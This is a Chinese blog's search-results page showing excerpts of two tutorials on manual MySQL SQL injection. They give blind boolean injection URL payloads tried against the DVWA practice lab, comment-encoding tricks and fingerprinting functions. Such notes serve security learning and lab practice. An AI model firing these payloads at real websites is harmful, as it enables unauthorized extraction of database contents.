TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 3 篇与 mysql注入 的结果
2020-03-25

SQl盲注手注笔记-视频详解

SQl盲注手注笔记-视频详解
sql盲注手注笔记基于布尔的盲注此文所使用工具及环境:浏览器 hackbar插件 DVWA漏洞靶场环境 sqlmap常见注入函数:Length()函数 返回字符串的长度Substr()截取字符串Ascii()返回字符的ascii码ord() 类似于ascii码mid() 和substr用法相同以下操作请使用二分法报数据库名http://url/?id=1'and (length(database()))>10--%20 测试数据库名的长度http://url/?id=1%27 and ord(substr(database(),1,1))=118--%20 爆出数据库名的第一位http://url/?id=1%27 and ord(substr(database(),2,1))=118--%20 爆出数据库名的第二位后面依次类推...猜解指定数据库下的表名长度?id=1' and length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1...
2020年03月25日
667 阅读
0 评论
2020-02-21

SQL注入第三篇-mysql手工注入

SQL注入第三篇-mysql手工注入
mysql手工注入常用的注释--+ -- 这个注释直到该行结束--+ 可以用#替换,url 提交过程中 Url 编码后的#为%23# 这个注释直到该行结束说明一下:我们在注入的时候,为什么使用的%23而不是#,因为由于编码的问题,在浏览器中直接提交#会变成空,所以我们使用url编码后的#,即%23,当传输到后端时,后端语言会对它自动解码成#,才能够成功带入数据库查询。查询字段order by 5 --+收集信息在爆出的字段值里面可以替换为我们的恶意语句,前期主要是收集信息,包括判断当前数据库是否是root用户,MySQL的版本等,一般收集这些信息常用一些MySQL自带的函数去收集信息:MySQL常用的系统函数version() #MySQL版本user() #数据库用户名database() #数据库名@@datadir #数据库路径@@version_compile_os #操作系统版本联合查询UNION SELECT 联合查询,手工注入经典语句查询当前数据库名SELECT 1,2,...
2020年02月21日
795 阅读
0 评论

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云